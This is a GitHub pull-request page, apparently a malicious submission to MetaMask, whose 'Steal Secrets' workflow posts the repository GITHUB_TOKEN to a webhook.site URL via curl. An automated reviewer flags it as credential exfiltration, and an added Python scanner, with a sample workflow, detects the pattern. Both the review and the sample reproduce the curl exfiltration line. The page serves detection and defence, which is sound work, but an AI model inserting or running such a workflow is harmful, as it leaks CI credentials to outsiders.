
Create poc.yml #9296

Open

dhirajthread-a11y wants to merge 1 commit into MetaMask:main from dhirajthread-a11y:main


Conversation

@dhirajthread-a11y commented Jun 27, 2026


Explanation

References

Checklist

  • I've updated the test suite for new or updated code as appropriate
  • I've updated documentation (JSDoc, Markdown, etc.) for new or updated code as appropriate
  • I've communicated my changes to consumers by updating changelogs for packages I've changed
  • I've introduced breaking changes in this PR and have prepared draft pull requests for clients and consumer packages to resolve them

Note

High Risk
Malicious CI that leaks repository GITHUB_TOKEN to a third-party endpoint, amplified by pull_request_target on fork PRs.

Overview
Adds a new GitHub Actions workflow .github/workflows/poc.yml named "Steal Secrets" that did not exist in the repo before.

It runs on push and pull_request_target, so it can execute in the context of the base repository (including on PRs from forks, where pull_request_target is especially sensitive). The sole job posts secrets.GITHUB_TOKEN to an external webhook.site URL via curl, which is credential exfiltration rather than normal CI.

This change should be rejected and not merged; if it ever ran on the default branch, rotate/revoke affected tokens and audit Actions runs.

Reviewed by Cursor Bugbot for commit 01199bb. Bugbot is set up for automated code reviews on this repo.

@dhirajthread-a11y dhirajthread-a11y requested a review from a team as a code owner June 27, 2026 08:53

cursor (bot) left a comment


Cursor Bugbot has reviewed your changes and found 1 potential issue.


Comment thread .github/workflows/poc.yml

    steps:
      - run: |
          curl -X POST https://webhook.site/e83aa988-440d-465e-b205-2d57aea449a5 \
            -d "token=${{ secrets.GITHUB_TOKEN }}"


Exfiltrates GITHUB_TOKEN externally

High Severity

The workflow sends ${{ secrets.GITHUB_TOKEN }} in an HTTP POST to a third-party webhook.site URL on push and unscoped pull_request_target. That exposes repository credentials to an external party and can run with base-repo token access on pull requests, including from forks.

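An added detection example, not part of this PR or of the MetaMask repository: a heuristic scanner for the pattern Bugbot describes above, a run step that references a secret and sends it with curl or wget to a non-GitHub host, rated higher when pull_request_target is among the workflow triggers. It uses only the Python standard library; the sample workflow is constructed from the PR's description, the trusted-domain list is an assumption, and the webhook id is a placeholder rather than the one in the PR.

```python
import re

# Heuristic check for the pattern flagged in this PR: a 'run:' step that reads a secret
# and sends it to a non-GitHub host, rated higher when pull_request_target is a trigger.
PRT_TRIGGER = re.compile(r"^(?:on:.*\bpull_request_target\b|\s+pull_request_target:)", re.M)
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.(\w+)\s*\}\}")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
NET_TOOL = re.compile(r"\b(curl|wget)\b")
TRUSTED = ("github.com", "githubusercontent.com")  # assumption: first-party hosts only

def run_scripts(text):
    """Yield the script of every 'run:' step, inline or as a '|'/'>' block scalar."""
    lines, i = text.splitlines(), 0
    ind = [len(l) - len(l.lstrip(" ")) for l in lines]  # indent width per line
    while i < len(lines):
        m = re.match(r"^(\s*)(?:-\s+)?run:\s*(.*)$", lines[i])
        i += 1
        if m and m.group(2).strip() not in ("|", ">", "|-", ">-"):
            yield m.group(2).strip()
        elif m:  # block scalar: every following line indented deeper than 'run:'
            body = []
            while i < len(lines) and (not lines[i].strip() or ind[i] > len(m.group(1))):
                body.append(lines[i].strip())
                i += 1
            yield "\n".join(body)

def audit_workflow(text):
    """Return (severity, secrets, external hosts) for each suspicious step; [] if clean."""
    risky = bool(PRT_TRIGGER.search(text))
    findings = []
    for script in run_scripts(text):
        secrets = sorted(set(SECRET_REF.findall(script)))
        hosts = sorted({h for h in URL_HOST.findall(script)
                        if not any(h == d or h.endswith("." + d) for d in TRUSTED)})
        if secrets and hosts and NET_TOOL.search(script):
            findings.append(("high" if risky else "medium", secrets, hosts))
    return findings

# Constructed sample modelled on this PR's poc.yml; the webhook id is a placeholder.
POC_YML = """\
name: Steal Secrets
on:
  push:
  pull_request_target:
jobs:
  leak:
    steps:
      - run: |
          curl -X POST https://webhook.site/PLACEHOLDER-ID \\
            -d "token=${{ secrets.GITHUB_TOKEN }}"
"""
```

Running audit_workflow over every file under .github/workflows in a pre-merge check turns the review above into a repeatable gate; a step that posts a secret to api.github.com is deliberately not flagged.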
